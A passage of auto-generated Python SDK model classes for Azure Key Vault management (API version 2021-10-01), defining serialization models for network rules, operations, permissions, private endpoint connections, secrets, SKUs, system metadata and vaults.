"bypass": {"key": "bypass", "type": "str"},
"default_action": {"key": "defaultAction", "type": "str"},
"ip_rules": {"key": "ipRules", "type": "[IPRule]"},
"virtual_network_rules": {"key": "virtualNetworkRules", "type": "[VirtualNetworkRule]"},
}
def __init__(
self,
*,
bypass: Optional[Union[str, "_models.NetworkRuleBypassOptions"]] = None,
default_action: Optional[Union[str, "_models.NetworkRuleAction"]] = None,
ip_rules: Optional[List["_models.IPRule"]] = None,
virtual_network_rules: Optional[List["_models.VirtualNetworkRule"]] = None,
**kwargs: Any
) -> None:
"""
:keyword bypass: Tells what traffic can bypass network rules. This can be 'AzureServices' or
'None'. If not specified the default is 'AzureServices'. Known values are: "AzureServices" and
"None".
:paramtype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
:keyword default_action: The default action when no rule from ipRules and from
virtualNetworkRules match. This is only used after the bypass property has been evaluated.
Known values are: "Allow" and "Deny".
:paramtype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
:keyword ip_rules: The list of IP address rules.
:paramtype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.IPRule]
:keyword virtual_network_rules: The list of virtual network rules.
:paramtype virtual_network_rules:
list[~azure.mgmt.keyvault.v2021_10_01.models.VirtualNetworkRule]
"""
super().__init__(**kwargs)
self.bypass = bypass
self.default_action = default_action
self.ip_rules = ip_rules
self.virtual_network_rules = virtual_network_rules
class Operation(_serialization.Model):
"""Key Vault REST API operation definition.
:ivar name: Operation name: {provider}/{resource}/{operation}.
:vartype name: str
:ivar display: Display metadata associated with the operation.
:vartype display: ~azure.mgmt.keyvault.v2021_10_01.models.OperationDisplay
:ivar origin: The origin of operations.
:vartype origin: str
:ivar is_data_action: Property to specify whether the action is a data action.
:vartype is_data_action: bool
:ivar service_specification: One property of operation, include metric specifications.
:vartype service_specification: ~azure.mgmt.keyvault.v2021_10_01.models.ServiceSpecification
"""
_attribute_map = {
"name": {"key": "name", "type": "str"},
"display": {"key": "display", "type": "OperationDisplay"},
"origin": {"key": "origin", "type": "str"},
"is_data_action": {"key": "isDataAction", "type": "bool"},
"service_specification": {"key": "properties.serviceSpecification", "type": "ServiceSpecification"},
}
def __init__(
self,
*,
name: Optional[str] = None,
display: Optional["_models.OperationDisplay"] = None,
origin: Optional[str] = None,
is_data_action: Optional[bool] = None,
service_specification: Optional["_models.ServiceSpecification"] = None,
**kwargs: Any
) -> None:
"""
:keyword name: Operation name: {provider}/{resource}/{operation}.
:paramtype name: str
:keyword display: Display metadata associated with the operation.
:paramtype display: ~azure.mgmt.keyvault.v2021_10_01.models.OperationDisplay
:keyword origin: The origin of operations.
:paramtype origin: str
:keyword is_data_action: Property to specify whether the action is a data action.
:paramtype is_data_action: bool
:keyword service_specification: One property of operation, include metric specifications.
:paramtype service_specification: ~azure.mgmt.keyvault.v2021_10_01.models.ServiceSpecification
"""
super().__init__(**kwargs)
self.name = name
self.display = display
self.origin = origin
self.is_data_action = is_data_action
self.service_specification = service_specification
class OperationDisplay(_serialization.Model):
"""Display metadata associated with the operation.
:ivar provider: Service provider: Microsoft Key Vault.
:vartype provider: str
:ivar resource: Resource on which the operation is performed etc.
:vartype resource: str
:ivar operation: Type of operation: get, read, delete, etc.
:vartype operation: str
:ivar description: Description of operation.
:vartype description: str
"""
_attribute_map = {
"provider": {"key": "provider", "type": "str"},
"resource": {"key": "resource", "type": "str"},
"operation": {"key": "operation", "type": "str"},
"description": {"key": "description", "type": "str"},
}
def __init__(
self,
*,
provider: Optional[str] = None,
resource: Optional[str] = None,
operation: Optional[str] = None,
description: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword provider: Service provider: Microsoft Key Vault.
:paramtype provider: str
:keyword resource: Resource on which the operation is performed etc.
:paramtype resource: str
:keyword operation: Type of operation: get, read, delete, etc.
:paramtype operation: str
:keyword description: Description of operation.
:paramtype description: str
"""
super().__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class OperationListResult(_serialization.Model):
"""Result of the request to list Storage operations. It contains a list of operations and a URL
link to get the next set of results.
:ivar value: List of Storage operations supported by the Storage resource provider.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Operation]
:ivar next_link: The URL to get the next set of operations.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[Operation]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self, *, value: Optional[List["_models.Operation"]] = None, next_link: Optional[str] = None, **kwargs: Any
) -> None:
"""
:keyword value: List of Storage operations supported by the Storage resource provider.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Operation]
:keyword next_link: The URL to get the next set of operations.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class Permissions(_serialization.Model):
"""Permissions the identity has for keys, secrets, certificates and storage.
:ivar keys: Permissions to keys.
:vartype keys: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.KeyPermissions]
:ivar secrets: Permissions to secrets.
:vartype secrets: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.SecretPermissions]
:ivar certificates: Permissions to certificates.
:vartype certificates: list[str or
~azure.mgmt.keyvault.v2021_10_01.models.CertificatePermissions]
:ivar storage: Permissions to storage accounts.
:vartype storage: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.StoragePermissions]
"""
_attribute_map = {
"keys": {"key": "keys", "type": "[str]"},
"secrets": {"key": "secrets", "type": "[str]"},
"certificates": {"key": "certificates", "type": "[str]"},
"storage": {"key": "storage", "type": "[str]"},
}
def __init__(
self,
*,
keys: Optional[List[Union[str, "_models.KeyPermissions"]]] = None,
secrets: Optional[List[Union[str, "_models.SecretPermissions"]]] = None,
certificates: Optional[List[Union[str, "_models.CertificatePermissions"]]] = None,
storage: Optional[List[Union[str, "_models.StoragePermissions"]]] = None,
**kwargs: Any
) -> None:
"""
:keyword keys: Permissions to keys.
:paramtype keys: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.KeyPermissions]
:keyword secrets: Permissions to secrets.
:paramtype secrets: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.SecretPermissions]
:keyword certificates: Permissions to certificates.
:paramtype certificates: list[str or
~azure.mgmt.keyvault.v2021_10_01.models.CertificatePermissions]
:keyword storage: Permissions to storage accounts.
:paramtype storage: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.StoragePermissions]
"""
super().__init__(**kwargs)
self.keys = keys
self.secrets = secrets
self.certificates = certificates
self.storage = storage
class PrivateEndpoint(_serialization.Model):
"""Private endpoint object properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Full identifier of the private endpoint resource.
:vartype id: str
"""
_validation = {
"id": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
}
def __init__(self, **kwargs: Any) -> None:
""" """
super().__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(Resource):
"""Private endpoint connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified identifier of the key vault resource.
:vartype id: str
:ivar name: Name of the key vault resource.
:vartype name: str
:ivar type: Resource type of the key vault resource.
:vartype type: str
:ivar location: Azure location of the key vault resource.
:vartype location: str
:ivar tags: Tags assigned to the key vault resource.
:vartype tags: dict[str, str]
:ivar etag: Modified whenever there is a change in the state of private endpoint connection.
:vartype etag: str
:ivar private_endpoint: Properties of the private endpoint object.
:vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
:ivar private_link_service_connection_state: Approval state of the private link connection.
:vartype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:vartype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"location": {"readonly": True},
"tags": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"etag": {"key": "etag", "type": "str"},
"private_endpoint": {"key": "properties.privateEndpoint", "type": "PrivateEndpoint"},
"private_link_service_connection_state": {
"key": "properties.privateLinkServiceConnectionState",
"type": "PrivateLinkServiceConnectionState",
},
"provisioning_state": {"key": "properties.provisioningState", "type": "str"},
}
def __init__(
self,
*,
etag: Optional[str] = None,
private_endpoint: Optional["_models.PrivateEndpoint"] = None,
private_link_service_connection_state: Optional["_models.PrivateLinkServiceConnectionState"] = None,
provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
**kwargs: Any
) -> None:
"""
:keyword etag: Modified whenever there is a change in the state of private endpoint connection.
:paramtype etag: str
:keyword private_endpoint: Properties of the private endpoint object.
:paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
:keyword private_link_service_connection_state: Approval state of the private link connection.
:paramtype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
:keyword provisioning_state: Provisioning state of the private endpoint connection. Known
values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:paramtype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
super().__init__(**kwargs)
self.etag = etag
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = provisioning_state
class PrivateEndpointConnectionItem(_serialization.Model):
"""Private endpoint connection item.
:ivar id: Id of private endpoint connection.
:vartype id: str
:ivar etag: Modified whenever there is a change in the state of private endpoint connection.
:vartype etag: str
:ivar private_endpoint: Properties of the private endpoint object.
:vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
:ivar private_link_service_connection_state: Approval state of the private link connection.
:vartype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:vartype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
_attribute_map = {
"id": {"key": "id", "type": "str"},
"etag": {"key": "etag", "type": "str"},
"private_endpoint": {"key": "properties.privateEndpoint", "type": "PrivateEndpoint"},
"private_link_service_connection_state": {
"key": "properties.privateLinkServiceConnectionState",
"type": "PrivateLinkServiceConnectionState",
},
"provisioning_state": {"key": "properties.provisioningState", "type": "str"},
}
def __init__(
self,
*,
id: Optional[str] = None, # pylint: disable=redefined-builtin
etag: Optional[str] = None,
private_endpoint: Optional["_models.PrivateEndpoint"] = None,
private_link_service_connection_state: Optional["_models.PrivateLinkServiceConnectionState"] = None,
provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
**kwargs: Any
) -> None:
"""
:keyword id: Id of private endpoint connection.
:paramtype id: str
:keyword etag: Modified whenever there is a change in the state of private endpoint connection.
:paramtype etag: str
:keyword private_endpoint: Properties of the private endpoint object.
:paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
:keyword private_link_service_connection_state: Approval state of the private link connection.
:paramtype private_link_service_connection_state:
~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
:keyword provisioning_state: Provisioning state of the private endpoint connection. Known
values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
:paramtype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
"""
super().__init__(**kwargs)
self.id = id
self.etag = etag
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = provisioning_state
class PrivateEndpointConnectionListResult(_serialization.Model):
"""List of private endpoint connections.
:ivar value: The list of private endpoint connections.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnection]
:ivar next_link: The URL to get the next set of private endpoint connections.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[PrivateEndpointConnection]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self,
*,
value: Optional[List["_models.PrivateEndpointConnection"]] = None,
next_link: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword value: The list of private endpoint connections.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnection]
:keyword next_link: The URL to get the next set of private endpoint connections.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified identifier of the key vault resource.
:vartype id: str
:ivar name: Name of the key vault resource.
:vartype name: str
:ivar type: Resource type of the key vault resource.
:vartype type: str
:ivar location: Azure location of the key vault resource.
:vartype location: str
:ivar tags: Tags assigned to the key vault resource.
:vartype tags: dict[str, str]
:ivar group_id: Group identifier of private link resource.
:vartype group_id: str
:ivar required_members: Required member names of private link resource.
:vartype required_members: list[str]
:ivar required_zone_names: Required DNS zone names of the the private link resource.
:vartype required_zone_names: list[str]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"location": {"readonly": True},
"tags": {"readonly": True},
"group_id": {"readonly": True},
"required_members": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"group_id": {"key": "properties.groupId", "type": "str"},
"required_members": {"key": "properties.requiredMembers", "type": "[str]"},
"required_zone_names": {"key": "properties.requiredZoneNames", "type": "[str]"},
}
def __init__(self, *, required_zone_names: Optional[List[str]] = None, **kwargs: Any) -> None:
"""
:keyword required_zone_names: Required DNS zone names of the the private link resource.
:paramtype required_zone_names: list[str]
"""
super().__init__(**kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = required_zone_names
class PrivateLinkResourceListResult(_serialization.Model):
"""A list of private link resources.
:ivar value: Array of private link resources.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkResource]
"""
_attribute_map = {
"value": {"key": "value", "type": "[PrivateLinkResource]"},
}
def __init__(self, *, value: Optional[List["_models.PrivateLinkResource"]] = None, **kwargs: Any) -> None:
"""
:keyword value: Array of private link resources.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkResource]
"""
super().__init__(**kwargs)
self.value = value
class PrivateLinkServiceConnectionState(_serialization.Model):
"""An object that represents the approval state of the private link connection.
:ivar status: Indicates whether the connection has been approved, rejected or removed by the
key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
:vartype status: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
:ivar description: The reason for approval or rejection.
:vartype description: str
:ivar actions_required: A message indicating if changes on the service provider require any
updates on the consumer. "None"
:vartype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
"""
_attribute_map = {
"status": {"key": "status", "type": "str"},
"description": {"key": "description", "type": "str"},
"actions_required": {"key": "actionsRequired", "type": "str"},
}
def __init__(
self,
*,
status: Optional[Union[str, "_models.PrivateEndpointServiceConnectionStatus"]] = None,
description: Optional[str] = None,
actions_required: Optional[Union[str, "_models.ActionsRequired"]] = None,
**kwargs: Any
) -> None:
"""
:keyword status: Indicates whether the connection has been approved, rejected or removed by the
key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
:paramtype status: str or
~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
:keyword description: The reason for approval or rejection.
:paramtype description: str
:keyword actions_required: A message indicating if changes on the service provider require any
updates on the consumer. "None"
:paramtype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
"""
super().__init__(**kwargs)
self.status = status
self.description = description
self.actions_required = actions_required
class ResourceListResult(_serialization.Model):
"""List of vault resources.
:ivar value: The list of vault resources.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Resource]
:ivar next_link: The URL to get the next set of vault resources.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[Resource]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self, *, value: Optional[List["_models.Resource"]] = None, next_link: Optional[str] = None, **kwargs: Any
) -> None:
"""
:keyword value: The list of vault resources.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Resource]
:keyword next_link: The URL to get the next set of vault resources.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class Secret(Resource):
"""Resource information with extended details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified identifier of the key vault resource.
:vartype id: str
:ivar name: Name of the key vault resource.
:vartype name: str
:ivar type: Resource type of the key vault resource.
:vartype type: str
:ivar location: Azure location of the key vault resource.
:vartype location: str
:ivar tags: Tags assigned to the key vault resource.
:vartype tags: dict[str, str]
:ivar properties: Properties of the secret. Required.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"location": {"readonly": True},
"tags": {"readonly": True},
"properties": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"properties": {"key": "properties", "type": "SecretProperties"},
}
def __init__(self, *, properties: "_models.SecretProperties", **kwargs: Any) -> None:
"""
:keyword properties: Properties of the secret. Required.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
"""
super().__init__(**kwargs)
self.properties = properties
class SecretAttributes(Attributes):
"""The secret management attributes.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar enabled: Determines whether the object is enabled.
:vartype enabled: bool
:ivar not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
:vartype not_before: ~datetime.datetime
:ivar expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
:vartype expires: ~datetime.datetime
:ivar created: Creation time in seconds since 1970-01-01T00:00:00Z.
:vartype created: ~datetime.datetime
:ivar updated: Last updated time in seconds since 1970-01-01T00:00:00Z.
:vartype updated: ~datetime.datetime
"""
_validation = {
"created": {"readonly": True},
"updated": {"readonly": True},
}
_attribute_map = {
"enabled": {"key": "enabled", "type": "bool"},
"not_before": {"key": "nbf", "type": "unix-time"},
"expires": {"key": "exp", "type": "unix-time"},
"created": {"key": "created", "type": "unix-time"},
"updated": {"key": "updated", "type": "unix-time"},
}
def __init__(
self,
*,
enabled: Optional[bool] = None,
not_before: Optional[datetime.datetime] = None,
expires: Optional[datetime.datetime] = None,
**kwargs: Any
) -> None:
"""
:keyword enabled: Determines whether the object is enabled.
:paramtype enabled: bool
:keyword not_before: Not before date in seconds since 1970-01-01T00:00:00Z.
:paramtype not_before: ~datetime.datetime
:keyword expires: Expiry date in seconds since 1970-01-01T00:00:00Z.
:paramtype expires: ~datetime.datetime
"""
super().__init__(enabled=enabled, not_before=not_before, expires=expires, **kwargs)
class SecretCreateOrUpdateParameters(_serialization.Model):
"""Parameters for creating or updating a secret.
All required parameters must be populated in order to send to Azure.
:ivar tags: The tags that will be assigned to the secret.
:vartype tags: dict[str, str]
:ivar properties: Properties of the secret. Required.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
"""
_validation = {
"properties": {"required": True},
}
_attribute_map = {
"tags": {"key": "tags", "type": "{str}"},
"properties": {"key": "properties", "type": "SecretProperties"},
}
def __init__(
self, *, properties: "_models.SecretProperties", tags: Optional[Dict[str, str]] = None, **kwargs: Any
) -> None:
"""
:keyword tags: The tags that will be assigned to the secret.
:paramtype tags: dict[str, str]
:keyword properties: Properties of the secret. Required.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
"""
super().__init__(**kwargs)
self.tags = tags
self.properties = properties
class SecretListResult(_serialization.Model):
"""List of secrets.
:ivar value: The list of secrets.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Secret]
:ivar next_link: The URL to get the next set of secrets.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[Secret]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self, *, value: Optional[List["_models.Secret"]] = None, next_link: Optional[str] = None, **kwargs: Any
) -> None:
"""
:keyword value: The list of secrets.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Secret]
:keyword next_link: The URL to get the next set of secrets.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class SecretPatchParameters(_serialization.Model):
"""Parameters for patching a secret.
:ivar tags: The tags that will be assigned to the secret.
:vartype tags: dict[str, str]
:ivar properties: Properties of the secret.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretPatchProperties
"""
_attribute_map = {
"tags": {"key": "tags", "type": "{str}"},
"properties": {"key": "properties", "type": "SecretPatchProperties"},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
properties: Optional["_models.SecretPatchProperties"] = None,
**kwargs: Any
) -> None:
"""
:keyword tags: The tags that will be assigned to the secret.
:paramtype tags: dict[str, str]
:keyword properties: Properties of the secret.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretPatchProperties
"""
super().__init__(**kwargs)
self.tags = tags
self.properties = properties
class SecretPatchProperties(_serialization.Model):
"""Properties of the secret.
:ivar value: The value of the secret.
:vartype value: str
:ivar content_type: The content type of the secret.
:vartype content_type: str
:ivar attributes: The attributes of the secret.
:vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
"""
_attribute_map = {
"value": {"key": "value", "type": "str"},
"content_type": {"key": "contentType", "type": "str"},
"attributes": {"key": "attributes", "type": "SecretAttributes"},
}
def __init__(
self,
*,
value: Optional[str] = None,
content_type: Optional[str] = None,
attributes: Optional["_models.SecretAttributes"] = None,
**kwargs: Any
) -> None:
"""
:keyword value: The value of the secret.
:paramtype value: str
:keyword content_type: The content type of the secret.
:paramtype content_type: str
:keyword attributes: The attributes of the secret.
:paramtype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
"""
super().__init__(**kwargs)
self.value = value
self.content_type = content_type
self.attributes = attributes
class SecretProperties(_serialization.Model):
"""Properties of the secret.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The value of the secret. NOTE: 'value' will never be returned from the service, as
APIs using this model are is intended for internal use in ARM deployments. Users should use the
data-plane REST service for interaction with vault secrets.
:vartype value: str
:ivar content_type: The content type of the secret.
:vartype content_type: str
:ivar attributes: The attributes of the secret.
:vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
:ivar secret_uri: The URI to retrieve the current version of the secret.
:vartype secret_uri: str
:ivar secret_uri_with_version: The URI to retrieve the specific version of the secret.
:vartype secret_uri_with_version: str
"""
_validation = {
"secret_uri": {"readonly": True},
"secret_uri_with_version": {"readonly": True},
}
_attribute_map = {
"value": {"key": "value", "type": "str"},
"content_type": {"key": "contentType", "type": "str"},
"attributes": {"key": "attributes", "type": "SecretAttributes"},
"secret_uri": {"key": "secretUri", "type": "str"},
"secret_uri_with_version": {"key": "secretUriWithVersion", "type": "str"},
}
def __init__(
self,
*,
value: Optional[str] = None,
content_type: Optional[str] = None,
attributes: Optional["_models.SecretAttributes"] = None,
**kwargs: Any
) -> None:
"""
:keyword value: The value of the secret. NOTE: 'value' will never be returned from the service,
as APIs using this model are is intended for internal use in ARM deployments. Users should use
the data-plane REST service for interaction with vault secrets.
:paramtype value: str
:keyword content_type: The content type of the secret.
:paramtype content_type: str
:keyword attributes: The attributes of the secret.
:paramtype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.SecretAttributes
"""
super().__init__(**kwargs)
self.value = value
self.content_type = content_type
self.attributes = attributes
self.secret_uri = None
self.secret_uri_with_version = None
class ServiceSpecification(_serialization.Model):
"""One property of operation, include log specifications.
:ivar log_specifications: Log specifications of operation.
:vartype log_specifications: list[~azure.mgmt.keyvault.v2021_10_01.models.LogSpecification]
:ivar metric_specifications: Metric specifications of operation.
:vartype metric_specifications:
list[~azure.mgmt.keyvault.v2021_10_01.models.MetricSpecification]
"""
_attribute_map = {
"log_specifications": {"key": "logSpecifications", "type": "[LogSpecification]"},
"metric_specifications": {"key": "metricSpecifications", "type": "[MetricSpecification]"},
}
def __init__(
self,
*,
log_specifications: Optional[List["_models.LogSpecification"]] = None,
metric_specifications: Optional[List["_models.MetricSpecification"]] = None,
**kwargs: Any
) -> None:
"""
:keyword log_specifications: Log specifications of operation.
:paramtype log_specifications: list[~azure.mgmt.keyvault.v2021_10_01.models.LogSpecification]
:keyword metric_specifications: Metric specifications of operation.
:paramtype metric_specifications:
list[~azure.mgmt.keyvault.v2021_10_01.models.MetricSpecification]
"""
super().__init__(**kwargs)
self.log_specifications = log_specifications
self.metric_specifications = metric_specifications
class Sku(_serialization.Model):
"""SKU details.
All required parameters must be populated in order to send to Azure.
:ivar family: SKU family name. "A"
:vartype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuFamily
:ivar name: SKU name to specify whether the key vault is a standard vault or a premium vault.
Required. Known values are: "standard" and "premium".
:vartype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuName
"""
_validation = {
"family": {"required": True},
"name": {"required": True},
}
_attribute_map = {
"family": {"key": "family", "type": "str"},
"name": {"key": "name", "type": "str"},
}
def __init__(
self, *, family: Union[str, "_models.SkuFamily"] = "A", name: Union[str, "_models.SkuName"], **kwargs: Any
) -> None:
"""
:keyword family: SKU family name. "A"
:paramtype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuFamily
:keyword name: SKU name to specify whether the key vault is a standard vault or a premium
vault. Required. Known values are: "standard" and "premium".
:paramtype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.SkuName
"""
super().__init__(**kwargs)
self.family = family
self.name = name
class SystemData(_serialization.Model):
"""Metadata pertaining to creation and last modification of the key vault resource.
:ivar created_by: The identity that created the key vault resource.
:vartype created_by: str
:ivar created_by_type: The type of identity that created the key vault resource. Known values
are: "User", "Application", "ManagedIdentity", and "Key".
:vartype created_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
:ivar created_at: The timestamp of the key vault resource creation (UTC).
:vartype created_at: ~datetime.datetime
:ivar last_modified_by: The identity that last modified the key vault resource.
:vartype last_modified_by: str
:ivar last_modified_by_type: The type of identity that last modified the key vault resource.
Known values are: "User", "Application", "ManagedIdentity", and "Key".
:vartype last_modified_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
:ivar last_modified_at: The timestamp of the key vault resource last modification (UTC).
:vartype last_modified_at: ~datetime.datetime
"""
_attribute_map = {
"created_by": {"key": "createdBy", "type": "str"},
"created_by_type": {"key": "createdByType", "type": "str"},
"created_at": {"key": "createdAt", "type": "iso-8601"},
"last_modified_by": {"key": "lastModifiedBy", "type": "str"},
"last_modified_by_type": {"key": "lastModifiedByType", "type": "str"},
"last_modified_at": {"key": "lastModifiedAt", "type": "iso-8601"},
}
def __init__(
self,
*,
created_by: Optional[str] = None,
created_by_type: Optional[Union[str, "_models.IdentityType"]] = None,
created_at: Optional[datetime.datetime] = None,
last_modified_by: Optional[str] = None,
last_modified_by_type: Optional[Union[str, "_models.IdentityType"]] = None,
last_modified_at: Optional[datetime.datetime] = None,
**kwargs: Any
) -> None:
"""
:keyword created_by: The identity that created the key vault resource.
:paramtype created_by: str
:keyword created_by_type: The type of identity that created the key vault resource. Known
values are: "User", "Application", "ManagedIdentity", and "Key".
:paramtype created_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
:keyword created_at: The timestamp of the key vault resource creation (UTC).
:paramtype created_at: ~datetime.datetime
:keyword last_modified_by: The identity that last modified the key vault resource.
:paramtype last_modified_by: str
:keyword last_modified_by_type: The type of identity that last modified the key vault resource.
Known values are: "User", "Application", "ManagedIdentity", and "Key".
:paramtype last_modified_by_type: str or ~azure.mgmt.keyvault.v2021_10_01.models.IdentityType
:keyword last_modified_at: The timestamp of the key vault resource last modification (UTC).
:paramtype last_modified_at: ~datetime.datetime
"""
super().__init__(**kwargs)
self.created_by = created_by
self.created_by_type = created_by_type
self.created_at = created_at
self.last_modified_by = last_modified_by
self.last_modified_by_type = last_modified_by_type
self.last_modified_at = last_modified_at
class Vault(_serialization.Model):
"""Resource information with extended details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified identifier of the key vault resource.
:vartype id: str
:ivar name: Name of the key vault resource.
:vartype name: str
:ivar type: Resource type of the key vault resource.
:vartype type: str
:ivar location: Azure location of the key vault resource.
:vartype location: str
:ivar tags: Tags assigned to the key vault resource.
:vartype tags: dict[str, str]
:ivar system_data: System metadata for the key vault.
:vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
:ivar properties: Properties of the vault. Required.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
"properties": {"required": True},
}
